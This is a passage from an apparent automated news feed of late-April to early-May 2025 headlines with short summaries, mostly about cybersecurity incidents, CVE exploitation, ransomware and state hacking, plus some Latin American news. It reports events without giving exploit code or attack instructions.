    Autosummary: Below are the descriptions for these flaws: CVE-2024-38475 Apache HTTP Server Improper Escaping of Output Vulnerability CVE-2023-44221 SonicWall SMA100 Appliances OS Command Injection Vulnerability This week, SonicWall revealed that attackers actively exploited two security vulnerabilities, tracked as CVE-2023-44221 and CVE-2024-38475, in its SMA100 Secure Mobile Access appliances. "


    US indicts Black Kingdom ransomware admin for Microsoft Exchange attacks

    exploits ransomware
    2025-05-02 https://www.bleepingcomputer.com/news/security/us-indicts-black-kingdom-ransomware-admin-for-microsoft-exchange-attacks/
    A 36-year-old Yemeni national, who is believed to be the developer and primary operator of "Black Kingdom" ransomware, has been indicted by the United States for conducting 1,500 attacks on Microsoft Exchange servers. [...] "

    Autosummary: "


    UK NCSC: Cyberattacks impacting UK retailers are a wake-up call

    ciber
    2025-05-02 https://www.bleepingcomputer.com/news/security/uk-ncsc-cyberattacks-impacting-uk-retailers-are-a-wake-up-call/
    The United Kingdom's National Cyber Security Centre warned that ongoing cyberattacks impacting multiple UK retail chains should be taken as a "wake-up call." [...] "

    Autosummary: Other high-profile attacks linked to Scattered Spider include those on MGM Resorts, Caesars, MailChimp, Twilio, DoorDash, Coinbase, Riot Games, and Reddit. "


    Attackers exploited old flaws to breach SonicWall SMA appliances (CVE-2024-38475, CVE-2023-44221)

    exploits
    2025-05-02 https://www.helpnetsecurity.com/2025/05/02/sonicwall-cve-2024-38475-cve-2023-44221-exploited/

    Attackers have been using two previously known vulnerabilities (CVE-2024-38475, CVE-2023-44221) to compromise SonicWall secure mobile access devices, the vendor has confirmed by updating the associated advisories. CISA has added the two flaws to its Known Exploited Vulnerabilities catalog, and Watchtowr researchers have analyzed how they can be chained together and have released a proof-of-concept exploit (or, as they call it, a “Detection Artefact Generator”). The exploited vulnerabilities (CVE-2024-38475, CVE-2023-44221): SonicWall SMA100 appliances are VPN … More

    The post Attackers exploited old flaws to breach SonicWall SMA appliances (CVE-2024-38475, CVE-2023-44221) appeared first on Help Net Security.

    "

    Autosummary: CISA has added the two flaws to its Known Exploited Vulnerabilities catalog, and Watchtowr researchers have analyzed how they can be chained together and have released a proof-of-concept exploit (or, as they call it, a “Detection Artefact Generator”). "


    Chile issues tsunami warning after earthquake

    latam
    2025-05-02 https://www.bbc.com/news/articles/c8dg32qmg7qo
    The warning is issued for parts of the remote Magallanes region after a 7.4 magnitude earthquake strikes off the coast. "

    Autosummary: In Argentina, the earthquake was felt primarily in Ushuaia, with other towns affected "to a lesser extent", the office for the governor of the region said. "


    Co-op confirms data theft after DragonForce ransomware claims attack

    exploits ransomware
    2025-05-02 https://www.bleepingcomputer.com/news/security/co-op-confirms-data-theft-after-dragonforce-ransomware-claims-attack/
    The Co-op cyberattack is far worse than initially reported, with the company now confirming that data was stolen for a significant number of current and past customers. [...] "

    Autosummary: "This data includes Co-op Group members' personal data such as names and contact details, and did not include members' passwords, bank or credit card details, transactions or information relating to any members' or customers' products or services with the Co-op Group." DragonForce ransomware behind attack: today, the BBC first reported that affiliates for the DragonForce ransomware operation, the same hackers who breached M&S, are also behind the attack on Co-op. "


    Two dead after Peruvian navy ship hits oil platform in Amazon River

    latam industry
    2025-05-02 https://www.bbc.com/news/articles/cy70zlzrgd8o
    Thirty crew members were rescued from the vessel, while one person remains missing, Peru's defence ministry says. "

    Autosummary: "


    Low-tech phishing attacks are gaining ground

    financial
    2025-05-01 https://www.helpnetsecurity.com/2025/05/01/cybercriminals-email-attacks/

    Cybercriminals are increasingly favoring low-tech, human-centric attacks to bypass email scanning technologies, according to VIPRE Security. The report is based on an analysis of global real-world data and highlights the most significant email security trends from the first quarter of 2025. Callback phishing: cybercriminals are taking the sentiment “work smarter, not harder” to a whole other level with callback phishing scams, a vector that wasn’t even part of the equation last year. In Q1 2025, … More

    The post Low-tech phishing attacks are gaining ground appeared first on Help Net Security.

    "

    Autosummary: This is pertinent because link usage, which accounted for 75% of phishing attempts in Q1 2024, dropped by 42% in Q1 2025, making room for callbacks, which now account for nearly one in five attempts. "


    Hottest cybersecurity open-source tools of the month: April 2025

    ciber
    2025-05-01 https://www.helpnetsecurity.com/2025/05/01/hottest-cybersecurity-open-source-tools-of-the-month-april-2025/

    This month’s roundup features exceptional open-source cybersecurity tools that are gaining attention for strengthening security across various environments. GoSearch: open-source OSINT tool for uncovering digital footprints. GoSearch is an open-source OSINT tool built to uncover digital footprints linked to specific usernames. Designed for speed and accuracy, it lets users quickly track someone’s online presence across multiple platforms. Hawk Eye: open-source scanner uncovers secrets and PII across platforms. Hawk Eye is an open-source tool that helps … More

    The post Hottest cybersecurity open-source tools of the month: April 2025 appeared first on Help Net Security.

    "

    Autosummary: "


    SonicWall Confirms Active Exploitation of Flaws Affecting Multiple Appliance Models

    exploits
    2025-05-01 https://thehackernews.com/2025/05/sonicwall-confirms-active-exploitation.html
    SonicWall has revealed that two now-patched security flaws impacting its SMA100 Secure Mobile Access (SMA) appliances have been exploited in the wild. The vulnerabilities in question are listed below - CVE-2023-44221 (CVSS score: 7.2) - Improper neutralization of special elements in the SMA100 SSL-VPN management interface allows a remote authenticated attacker with administrative privilege to "

    Autosummary: "


    The 3 biggest cybersecurity threats to small businesses

    ciber
    2025-05-01 https://www.malwarebytes.com/blog/news/2025/05/the-3-biggest-cybersecurity-threats-to-small-businesses
    These 3 cybersecurity threats may not be the most sophisticated, but they're the most effective—and serious—threats for small businesses. "

    Autosummary: How to protect your business: use unique, strong passwords for each online account and store and create these passwords using a password manager; enable “multifactor authentication” on all important business accounts so that hackers who steal passwords cannot access accounts with only usernames and passwords; do not click on links from unknown senders; if you’re asked for login information through an email or online message, do not input your login info in the email or through whatever link you’re directed towards. How to protect your business: use unique, strong passwords for each account and store and create these passwords using a password manager; enable “multifactor authentication” on all important business accounts so that hackers who steal passwords cannot access accounts with only usernames and passwords; avoid phishing attacks by refusing to click on links from unknown senders; do not download any attachments from unknown senders or from unexpected emails. Modern gangs operate on a “Ransomware-as-a-Service” model, where ransomware developers lease out their malicious software to “affiliates” who, if successful in launching an attack, return a small portion of their ill-gotten gains back to the ransomware developers at the top. "


    Zero-day attacks on browsers and smartphones drop, says Google

    exploits
    2025-05-01 https://www.malwarebytes.com/blog/news/2025/05/zero-day-attacks-on-browsers-and-smartphones-drop-says-google
    Cybercriminals are having less success targeting end-user technology with zero-day attacks, said Google's security team this week. "

    Autosummary: That’s a consistently falling number; 90.32% of zero-day exploits targeted end-user tech in 2019, followed by 70.97%, 74.74%, 63.49%, and 63.27% respectively through 2023. In 2022, it found 63 zero-day exploits, and the year before that it was 95, but 2019 and 2020 both showed just 31 zero-day exploits each. "


    Claude AI Exploited to Operate 100+ Fake Political Personas in Global Influence Campaign

    exploits
    2025-05-01 https://thehackernews.com/2025/05/claude-ai-exploited-to-operate-100-fake.html
    Artificial intelligence (AI) company Anthropic has revealed that unknown threat actors leveraged its Claude chatbot for an "influence-as-a-service" operation to engage with authentic accounts across Facebook and X. The sophisticated activity, branded as financially-motivated, is said to have used its AI tool to orchestrate 100 distinct personas on the two social media platforms, creating a "

    Autosummary: Artificial intelligence (AI) company Anthropic has revealed that unknown threat actors leveraged its Claude chatbot for an "influence-as-a-service" operation to engage with authentic accounts across Facebook and X. The sophisticated activity, branded as financially-motivated, is said to have used its AI tool to orchestrate 100 distinct personas on the two social media platforms, creating a network of "politically-aligned accounts" that engaged with "10s of thousands" of authentic accounts. "


    DarkWatchman, Sheriff Malware Hit Russia and Ukraine with Stealth and Nation-Grade Tactics

    exploits industry
    2025-05-01 https://thehackernews.com/2025/05/darkwatchman-sheriff-malware-hit-russia.html
    Russian companies have been targeted as part of a large-scale phishing campaign that's designed to deliver a known malware called DarkWatchman. Targets of the attacks include entities in the media, tourism, finance and insurance, manufacturing, retail, energy, telecom, transport, and biotechnology sectors, Russian cybersecurity company F6 said. The activity is assessed to be the work of a "

    Autosummary: Targets of the attacks include entities in the media, tourism, finance and insurance, manufacturing, retail, energy, telecom, transport, and biotechnology sectors, Russian cybersecurity company F6 said. "


    Commvault Confirms Hackers Exploited CVE-2025-3928 as Zero-Day in Azure Breach

    exploits
    2025-05-01 https://thehackernews.com/2025/05/commvault-confirms-hackers-exploited.html
    Enterprise data backup platform Commvault has revealed that an unknown nation-state threat actor breached its Microsoft Azure environment by exploiting CVE-2025-3928 but emphasized there is no evidence of unauthorized data access. "This activity has affected a small number of customers we have in common with Microsoft, and we are working with those customers to provide assistance," the company "

    Autosummary: "


    Two SonicWall SMA100 flaws actively exploited in the wild

    exploits
    2025-05-01 https://securityaffairs.com/177278/security/two-sonicwall-sma100-flaws-actively-exploited-in-the-wild.html
    SonicWall confirmed that threat actors actively exploited two vulnerabilities impacting its SMA100 Secure Mobile Access (SMA) appliances. SonicWall revealed that attackers actively exploited two security vulnerabilities, tracked as CVE-2023-44221 and CVE-2024-38475, in its SMA100 Secure Mobile Access appliances. Below are the descriptions of the two flaws: “During further analysis, SonicWall and trusted security partners identified an […] "

    Autosummary: The company addressed the flaws with the following releases: CVE-2023-44221 – 10.2.1.10-62sv and higher versions (fixed on December 4, 2023); CVE-2024-38475 – 10.2.1.14-75sv and higher versions (fixed on December 4, 2024). "


    Hive0117 group targets Russian firms with new variant of DarkWatchman malware

    exploits rusia-ucrania
    2025-05-01 https://securityaffairs.com/177268/cyber-crime/hive0117-targets-russian-firms-with-darkwatchman-malware.html
    Hive0117 targets Russian firms in multiple sectors with phishing attacks using a modified version of the DarkWatchman malware. A cybercrime group named Hive0117 is behind a fresh phishing campaign that targeted Russian organizations with a new version of the DarkWatchman malware, according to Russian cybersecurity firm F6. The financially-motivated group targeted organizations in the media, […] "

    Autosummary: The financially-motivated group targeted organizations in the media, tourism, finance, insurance, manufacturing, energy, telecommunications, biotechnology and retail sectors. "


    Football-loving Brazilian nun, world's oldest person, dies at 116

    latam
    2025-05-01 https://www.bbc.com/news/articles/cr4nv0g15xyo
    Born on 8 June 1908 in southern Brazil, Sister Inah Canabarro Lucas dedicated her life to God and teaching. "

    Autosummary: "She is very grateful, and good-humoured," Sister Terezinha Aragon told Brazilian TV in January, when Sister Inah became the world"s oldest person after the death of the previous holder of the title, Japanese woman Tomiko Itooka at the age of 116. "


    Ukrainian extradited to US for Nefilim ransomware attacks

    exploits ransomware
    2025-05-01 https://www.bleepingcomputer.com/news/security/ukrainian-extradited-to-us-for-nefilim-ransomware-attacks/
    A Ukrainian national has been extradited from Spain to the United States to face charges over allegedly conducting Nefilim ransomware attacks against companies. [...] "

    Autosummary: According to the U.S. Department of Justice, Stryzhak allegedly participated in ransomware attacks that targeted high-revenue companies, primarily in the United States, Norway, France, Switzerland, Germany, and the Netherlands. "


    Harrods the next UK retailer targeted in a cyberattack

    ciber
    2025-05-01 https://www.bleepingcomputer.com/news/security/harrods-the-next-uk-retailer-targeted-in-a-cyberattack/
    London's iconic department store, Harrods, has confirmed it was targeted in a cyberattack, becoming the third major UK retailer to report cyberattacks in a week following incidents at M&S and the Co-op. [...] "

    Autosummary: M&S and Co-op also hit by cyberattacks: last week, Marks and Spencer confirmed it had suffered a cyberattack that led to disruption of its online ordering systems, contactless payments, and Click & Collect service. "


    FBI shared a list of phishing domains associated with the LabHost PhaaS platform

    financial
    2025-05-01 https://securityaffairs.com/177293/cyber-crime/fbi-shared-a-list-of-phishing-domains-associated-with-the-labhost-phaas-platform.html
    The FBI shared 42K phishing domains tied to LabHost, a PhaaS platform shut down in April 2024, to boost awareness and help identify compromises. The FBI shared a list of 42,000 domains registered from November 2021 to Apr 2024, linked to LabHost to raise awareness and aid in threat detection. The domain list helps prevent […] "

    Autosummary: Pierluigi Paganini, May 01, 2025. The FBI shared 42K phishing domains tied to LabHost, a PhaaS platform shut down in April 2024, to boost awareness and help identify compromises. In April 2024, an international law enforcement operation, codenamed Nebulae and coordinated by Europol, led to the disruption of LabHost, which is one of the world’s largest phishing-as-a-service platforms. "


    Canadian electric utility Nova Scotia Power and parent company Emera suffered a cyberattack

    ciber
    2025-05-01 https://securityaffairs.com/177281/hacking/canadian-electric-utility-nova-scotia-power-and-parent-company-emera-suffered-a-cyberattack.html
    Canadian electric utility Nova Scotia Power and parent company Emera are facing a cyberattack that disrupted their IT systems and networks. Nova Scotia Power Inc. is a vertically integrated electric utility serving the province of Nova Scotia, Canada. Headquartered in Halifax, it is a subsidiary of Emera Inc. The company provides electricity to over 500,000 […] "

    Autosummary: Its operations encompass generation, transmission, and distribution of electricity, utilizing a diverse mix of energy sources including coal, natural gas, hydroelectric, wind, tidal, oil, and biomass. "


    U.S. CISA adds SAP NetWeaver flaw to its Known Exploited Vulnerabilities catalog

    exploits
    2025-04-30 https://securityaffairs.com/177218/hacking/u-s-cisa-adds-sap-netweaver-flaw-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds SAP NetWeaver flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the SAP NetWeaver flaw, tracked as CVE-2025-31324, to its Known Exploited Vulnerabilities (KEV) catalog. Last week, researchers warned that a zero-day vulnerability, tracked as CVE-2025-31324 (CVSS score of 10/10), in SAP NetWeaver is […] "

    Autosummary: “On April 22, 2025, ReliaQuest published an investigation into exploitation activity targeting SAP NetWeaver systems, uncovering a critical vulnerability later identified by SAP as ‘CVE-2025-31324’ with a severity score of 10,” reads the report published by ReliaQuest. The delayed follow-up after initial access suggests the attacker may be an initial access broker, likely selling access via VPN, RDP, or vulnerabilities on forums. "


    Property renters targeted in simple BEC scam

    financial
    2025-04-30 https://www.helpnetsecurity.com/2025/04/30/property-renters-targeted-in-simple-bec-scam/

    Emails purportedly sent by rental property management firms are being used to steal money from people in France and Canada, Proofpoint researchers have warned. A BEC scam preying on renters “Most campaigns are sent from compromised mailboxes belonging to educational institutions in various regions, and use a generic subject line, for example ‘Loyer’ and ‘Nouveau RIB’,” Proofpoint says. “The term ‘RIB’ refers to ‘Relevé d’Identité Bancaire’ (which roughly translates to ‘bank account identity statement’). Early … More

    The post Property renters targeted in simple BEC scam appeared first on Help Net Security.

    "

    Autosummary: Early campaigns often included attached PDFs using logos and statements such as ‘Gestion locative de bien immobilier’ (‘Rental property management’), ‘Garantie des loyers’ (‘Rent guarantee’), and ‘Gestion immobilier comptabilité’ (‘Real estate management accounting’). "


    Targeted attacks on Colombian security forces leave 27 dead in two weeks

    latam
    2025-04-30 https://www.bbc.com/news/articles/czx1e0x762lo
    The government says armed illegal groups are launching deadly revenge attacks on the security forces. "

    Autosummary: Targeted attacks on Colombian security forces leave 27 dead in two weeks. The bodies of six soldiers were found at the site of an ambush in Guaviare; the body of a seventh missing soldier was found later. Petro was elected on a promise to bring "total peace" to Colombia, but on Friday his interior minister acknowledged that the strategy was "not going well", following the breakdown of talks with the Gulf Clan and several other armed groups. "


    Drone footage shows scale of deadly Peru landslide

    latam
    2025-04-30 https://www.bbc.com/news/videos/cz6d4nlgzdlo
    Two people are killed after a glacial lagoon overflowed in the Ancash region triggering a landslide. "

    Autosummary: "


    FBI shares massive list of 42,000 LabHost phishing domains

    financial
    2025-04-30 https://www.bleepingcomputer.com/news/security/fbi-shares-massive-list-of-42-000-labhost-phishing-domains/
    The FBI has shared 42,000 phishing domains tied to the LabHost cybercrime platform, one of the largest global phishing-as-a-service (PhaaS) platforms that was dismantled in April 2024. [...] "

    Autosummary: It featured extensive customization options, advanced 2FA-bypassing mechanisms, automatic SMS-based interactions with victims, and a real-time campaign management panel. "


    Ascension discloses new data breach after third-party hacking incident

    financial
    2025-04-30 https://www.bleepingcomputer.com/news/security/ascension-discloses-new-data-breach-after-third-party-hacking-incident/
    Ascension, one of the largest private healthcare systems in the United States, is notifying patients that their personal and health information was stolen in a December 2024 data theft attack, which affected a former business partner. [...] "

    Autosummary: "


    Fake Social Security Statement emails trick users into installing remote tool

    government
    2025-04-30 https://www.malwarebytes.com/blog/news/2025/04/fake-social-security-statement-emails-trick-users-into-installing-remote-tool
    Fake emails pretending to come from the US Social Security Administration try to get targets to install ScreenConnect for remote access. "

    Autosummary: And blocks connections to these associated domains. What we can do: When receiving unsolicited emails there are a few necessary precautions you can take to avoid falling for phishing: Verify the source of the email through independent sources. "


    Download: Edgescan 2025 Vulnerability Statistics Report

    exploits industry
    2025-04-30 https://www.helpnetsecurity.com/2025/04/30/edgescan-2025-vulnerability-statistics/

    Edgescan’s 2025 Vulnerability Statistics Report explores risk density patterns across network/device and application layers, uncovers complex vulnerabilities that automated tools consistently miss, and evaluates the real-world effectiveness of leading vulnerability scoring methodologies, including EPSS, CISA KEV, CVSS, and our proprietary EVSS system. This year’s findings reveal significant industry variances in vulnerability remediation efficiency, with software companies achieving the fastest mean time to remediate (63 days), while construction sector organizations lag considerably (104 days). Edgescan also … More

    The post Download: Edgescan 2025 Vulnerability Statistics Report appeared first on Help Net Security.

    "

    Autosummary: "


    Nebulous Mantis Targets NATO-Linked Entities with Multi-Stage Malware Attacks

    exploits
    2025-04-30 https://thehackernews.com/2025/04/nebulous-mantis-targets-nato-linked.html
    Cybersecurity researchers have shed light on a Russian-speaking cyber espionage group called Nebulous Mantis that has deployed a remote access trojan called RomCom RAT since mid-2022. RomCom "employs advanced evasion techniques, including living-off-the-land (LOTL) tactics and encrypted command and control (C2) communications, while continuously evolving its infrastructure – leveraging "

    Autosummary: RomCom, besides manipulating Windows Registry to set up persistence using COM hijacking, is equipped to harvest credentials, perform system reconnaissance, enumerate Active Directory, conduct lateral movement, and collect data of interest, including files, credentials, configuration details, and Microsoft Outlook backups. "


    France links Russian APT28 to attacks on dozen French entities

    rusia-ucrania
    2025-04-30 https://securityaffairs.com/177238/apt/france-links-russian-apt28-to-attacks-on-dozen-french-entities.html
    France blames Russia-linked APT28 for cyberattacks targeting or compromising a dozen French government bodies and other entities. The Russia-linked APT28 group has targeted or compromised a dozen government organizations and other French entities, the French Government states. In 2024, it was observed attacking OT organizations and linked to cyberattacks on 60 entities in Asia and […] "

    Autosummary: Since 2021, APT28 has targeted or compromised French ministerial bodies, local governments, DTIB, aerospace, research, think-tanks, and financial entities. "


    SonicWall: SMA100 VPN vulnerabilities now exploited in attacks

    exploits
    2025-04-30 https://www.bleepingcomputer.com/news/security/sonicwall-sma100-vpn-vulnerabilities-now-exploited-in-attacks/
    Cybersecurity company SonicWall has warned customers that several vulnerabilities impacting its Secure Mobile Access (SMA) appliances are now being actively exploited in attacks. [...] "

    Autosummary: "


    Smashing Security podcast #415: Hacking hijinks at the hospital, and WASPI scams

    financial
    2025-04-30 https://grahamcluley.com/smashing-security-podcast-415-hacking-hijinks-at-the-hospital-and-waspi-scams/
    He's not a pop star, but Jeffrey Bowie is alleged to have toured staff areas of a hospital in Oklahoma, hunting for computers he could install spyware on. We dive into the bizarre case of the man accused of hacking medical networks and then sharing how he did it on LinkedIn. Plus! Move over Nigerian princes — the WASPI scams are here. Fraudsters are now targeting UK women born in the 1950s, exploiting pension injustice for phishing gain. All this and more is discussed in the latest edition of the "Smashing Security" podcast by cybersecurity veterans Graham Cluley and Carole Theriault. "

    Autosummary: Hosts: Graham Cluley: @grahamcluley.com; Carole Theriault: @caroletheriault. Episode links: Sponsored by: Vanta – Expand the scope of your security program with market-leading compliance automation… while saving time and money. "


    Mexico City GP signs extension until 2028

    latam government
    2025-04-30 https://www.bbc.com/sport/formula1/articles/c17512zz80xo
    Mexico City will stay on the Formula 1 calendar until at least 2028 after signing a new three-year contract. "

    Autosummary: "


    Eyes, ears, and now arms: IoT is alive

    industry
    2025-04-29 https://www.helpnetsecurity.com/2025/04/29/humanoid-robots-security/

    I’ve never quite seen anything like this in my two decades of working in the Internet of Things (IoT) space. In just a few years, devices at home and work started including cameras to see and microphones to hear. Now, with new lines of vacuums and emerging humanoid robots, devices have appendages to manipulate the world around them. They’re not only able to collect information about their environment but can touch, “feel”, and move it. … More

    The post Eyes, ears, and now arms: IoT is alive appeared first on Help Net Security.

    "

    Autosummary: Likewise, users can more safely participate in the robot revolution by segmenting their home networks, implementing multi-factor authentication, and regularly reviewing device permissions. Armed with, well, arms, this evolution interconnects cybersecurity with physical security. This means following best practice cybersecurity by enabling peer-to-peer connectivity, outlawing generic credentials, and supporting software throughout the device lifecycle. "


    Malware Attack Targets World Uyghur Congress Leaders via Trojanized UyghurEdit++ Tool

    exploits
    2025-04-29 https://thehackernews.com/2025/04/malware-attack-targets-world-uyghur.html
    In a new campaign detected in March 2025, senior members of the World Uyghur Congress (WUC) living in exile have been targeted by a Windows-based malware that's capable of conducting surveillance. The spear-phishing campaign involved the use of a trojanized version of a legitimate open-source word processing and spell check tool called UyghurEdit++ developed to support the use of the Uyghur "

    Autosummary: "


    CISA Adds Actively Exploited Broadcom and Commvault Flaws to KEV Database

    exploits
    2025-04-29 https://thehackernews.com/2025/04/cisa-adds-actively-exploited-broadcom.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added two high-severity security flaws impacting Broadcom Brocade Fabric OS and Commvault Web Server to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The vulnerabilities in question are listed below - CVE-2025-1976 (CVSS score: 8.6) - A code injection flaw "

    Autosummary: For software customers, this means your environment must be: (i) accessible via the internet, (ii) compromised through an unrelated avenue, and (iii) accessed leveraging legitimate user credentials. "


    U.S. CISA adds Qualitia Active! Mail, Broadcom Brocade Fabric OS, and Commvault Web Server flaws to its Known Exploited Vulnerabilities catalog

    exploits
    2025-04-29 https://securityaffairs.com/177161/hacking/u-s-cisa-adds-qualitia-active-mail-broadcom-brocade-fabric-os-and-commvault-web-server-flaws-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Qualitia Active! Mail, Broadcom Brocade Fabric OS, and Commvault Web Server flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Qualitia Active! Mail, Broadcom Brocade Fabric OS, and Commvault Web Server flaws to its Known Exploited Vulnerabilities (KEV) catalog. Below are […] "

    Autosummary: U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Qualitia Active! Mail, Broadcom Brocade Fabric OS, and Commvault Web Server flaws to its Known Exploited Vulnerabilities catalog. "


    Marks & Spencer cyber incident linked to ransomware group

    exploits ransomware
    2025-04-29 https://www.helpnetsecurity.com/2025/04/29/marks-spencer-ransomware-breach-incident/

    The “cyber incident” that British multinational retailer Marks & Spencer has been struggling with for over a week is a ransomware attack, multiple sources have asserted. The Telegraph’s sources say ransomware was deployed by an unnamed criminal gang. Bleeping Computer’s sources say the attackers were members of the Scattered Spider hacking group, and that M&S’s virtual machines on VMware ESXi hosts have been encrypted with the DragonForce encryptor. The effects of the attack The company publicly … More

    The post Marks & Spencer cyber incident linked to ransomware group appeared first on Help Net Security.

    "

    Autosummary: The effects of the attack have been felt by customers: online orders have been (and are still) suspended, contactless payments and the redemption of gift cards were temporarily impossible, some orders went undelivered, refunds were delayed, and the customer reward scheme was paused. "


    Bugcrowd enables organizations to test their security environments

    exploits
    2025-04-29 https://www.helpnetsecurity.com/2025/04/29/bugcrowd-rtaas/

    Bugcrowd’s new service connects customers with a global network of vetted ethical hackers for a variety of red team engagements—fully managed through the Bugcrowd Platform. This release sets a new benchmark in the red team services market, enabling organizations to test their security environments with the highest level of confidence. By tapping into a global pool of experts using the latest adversarial tactics, techniques, and procedures (TTPs), customers gain unparalleled insight into how real-world attackers … More

    The post Bugcrowd enables organizations to test their security environments appeared first on Help Net Security.

    "

    Autosummary: High return on investment: Take advantage of flexible pricing options, including day-rate engagements, reward pools, and continuous programs, to suit a range of needs, budgets, and objectives. Operators mimic the behaviors of nation-state actors, organized cybercriminals, and insider threats to authentically test an organization’s ability to detect, respond to, and contain advanced attacks. "


    Google Reports 75 Zero-Days Exploited in 2024 — 44% Targeted Enterprise Security Products

    exploits
    2025-04-29 https://thehackernews.com/2025/04/google-reports-75-zero-days-exploited.html
    Google has revealed that it observed 75 zero-day vulnerabilities exploited in the wild in 2024, down from 98 in 2023.  Of the 75 zero-days, 44% of them targeted enterprise products. As many as 20 flaws were identified in security software and appliances. "Zero-day exploitation of browsers and mobile devices fell drastically, decreasing by about a third for browsers and by about half for "

    Autosummary: What's more, the zero-day exploitation of 34 of the 75 flaws have been attributed to six broad threat activity clusters - State-sponsored espionage (10), led by China (5), Russia (1), and South Korea (1) (e.g., CVE-2023-46805, CVE-2024-21887); Commercial surveillance vendors (8) (e.g., CVE-2024-53104, CVE-2024-32896, CVE-2024-29745, CVE-2024-29748); Non-state financially motivated groups (5) (e.g., CVE-2024-55956) "


    VeriSource data breach impacted 4M individuals

    financial
    2025-04-29 https://securityaffairs.com/177172/data-breach/verisource-services-inc-data-breach.html
    VeriSource breach exposed data of 4M people in Feb 2024; stolen info includes personal details from an employee benefits services provider. VeriSource is alerting 4 million people after a February 2024 breach that exposed personal information. The data was stolen on February 27, 2024, and the incident was discovered on February 28, 2024. The company […] "

    Autosummary: The review ended on August 12, 2024, revealing personal data like names, addresses, dates of birth, gender, and/or Social Security numbers were compromised. "


    CISA tags Broadcom Fabric OS, CommVault flaws as exploited in attacks

    exploits
    2025-04-29 https://www.bleepingcomputer.com/news/security/cisa-tags-broadcom-fabric-os-commvault-flaws-as-exploited-in-attacks/
    The U.S. Cybersecurity & Infrastructure Security Agency (CISA) is warning of Broadcom Brocade Fabric OS, Commvault web servers, and Qualitia Active! Mail clients vulnerabilities that are actively exploited in attacks. [...] "

    Autosummary: CISA has given impacted organizations until May 17, 2025, to apply fixes or available mitigations for CVE-2025-3928 and May 19, 2025, for the other two flaws. "


    Google: 97 zero-days exploited in 2024, over 50% in spyware attacks

    exploits
    2025-04-29 https://www.bleepingcomputer.com/news/security/google-97-zero-days-exploited-in-2024-over-50-percent-in-spyware-attacks/
    Google's Threat Intelligence Group (GTIG) says attackers exploited 75 zero-day vulnerabilities in the wild last year, over 50% of which were linked to spyware attacks. [...] "

    Autosummary: In 2024, end-user platforms and products (e.g., web browsers, mobile devices, and desktop operating systems) bore the brunt of this activity, making up 56 percent of the tracked zero-days. "


    Ransomware attacks on critical infrastructure surge, reports FBI

    exploits
    2025-04-29 https://www.tripwire.com/state-of-security/ransomware-attacks-critical-infrastructure-surge-reports-fbi
    The FBI is set to report that ransomware was the most pervasive cybersecurity threat to US critical infrastructure during the year of 2024, with complaints of ransomware attacks against critical sectors jumping 9% over the previous year. Read more in my article on the Tripwire State of Security blog. "

    Autosummary: Otherwise, we’ll be back here next year, reporting another surge and asking, yet again, when on earth things will begin to get better. "


    Bitwarden Access Intelligence defends against credential risks and phishing

    financial
    2025-04-29 https://www.helpnetsecurity.com/2025/04/29/bitwarden-access-intelligence/

    Bitwarden launched Access Intelligence, a set of new capabilities that enables enterprises to proactively defend against internal credential risks and external phishing threats. Access Intelligence introduces two core functionalities: Risk Insights, which allows IT teams to identify, prioritize, and remediate at-risk credentials; and Advanced Phishing Blocker, which alerts and redirects users away from known phishing sites in real-time, using a continuously updated open source blocklist of malicious domains. This approach enables better protection for users … More

    The post Bitwarden Access Intelligence defends against credential risks and phishing appeared first on Help Net Security.

    "

    Autosummary: Empower teams to act, remediate, and prevent threats: The Risk Insights for Access Intelligence dashboard delivers actionable visibility into credential-related security risks, empowering IT administrators to: identify weak, reused, or exposed credentials stored across key business applications; prioritize remediation efforts based on application importance; automatically alert end users of compromised credentials; initiate guided remediation workflows; and monitor password health improvements across the organization. These workflows help close security gaps while reinforcing enterprise access policies. "


    CISA warns about actively exploited Broadcom, Commvault vulnerabilities

    exploits
    2025-04-29 https://www.helpnetsecurity.com/2025/04/29/cisa-warns-about-actively-exploited-broadcom-commvault-vulnerabilities-cve-2025-1976-cve-2025-3928/

    The Cybersecurity and Infrastructure Security Agency (CISA) has added three new flaws to its Known Exploited Vulnerabilities catalog on Monday, affecting Commvault (CVE-2025-3928), Active! Mail (CVE-2025-42599), and Broadcom Brocade (CVE-2025-1976) solutions. CISA’s KEV catalog is constantly updated and provides IT admins in US federal civilian agencies with instructions on how to remediate these threats and by which date (as mandated by the Binding Operational Directive 22-01), but this living document can also come in handy … More

    The post CISA warns about actively exploited Broadcom, Commvault vulnerabilities appeared first on Help Net Security.

    "

    Autosummary: “Through a flaw in IP Address validation, a local user, assigned one of the pre-defined admin roles or a user-defined role with admin-level privileges, can execute arbitrary code as if they had full root level access,” Broadcom said in an advisory published nearly two weeks ago. "


    Google Threat Intelligence Group (GTIG) tracked 75 actively exploited zero-day flaws in 2024

    exploits
    2025-04-29 https://securityaffairs.com/177180/hacking/google-threat-intelligence-group-gtig-tracked-75-actively-exploited-zero-day-flaws-in-2024.html
    Google tracked 75 zero-day flaws exploited in 2024, down from 98 in 2023, according to its Threat Intelligence Group’s latest analysis. In 2024, Google tracked 75 exploited zero-day vulnerabilities, down from 98 in 2023 but up from 63 in 2022. The researchers from Google Threat Intelligence Group (GTIG) observed that the most targeted are end-user platforms, […] "

    Autosummary: Google tracked 75 zero-day flaws exploited in 2024, down from 98 in 2023, according to its Threat Intelligence Group’s latest analysis. "


    France ties Russian APT28 hackers to 12 cyberattacks on French orgs

    rusia-ucrania ciber
    2025-04-29 https://www.bleepingcomputer.com/news/security/france-ties-russian-apt28-hackers-to-12-cyberattacks-on-french-orgs/
    Today, the French foreign ministry blamed the APT28 hacking group linked to Russia's military intelligence service (GRU) for targeting or breaching a dozen French entities over the last four years. [...] "

    Autosummary: According to NATO, these recent incidents include "sabotage, acts of violence, cyber and electronic interference, disinformation campaigns, and other hybrid operations" that have impacted Czechia, Estonia, Germany, Latvia, Lithuania, Poland, as well as the United Kingdom. "


    SK Telecom cyberattack: Free SIM replacements for 25 million customers

    ciber Telcos
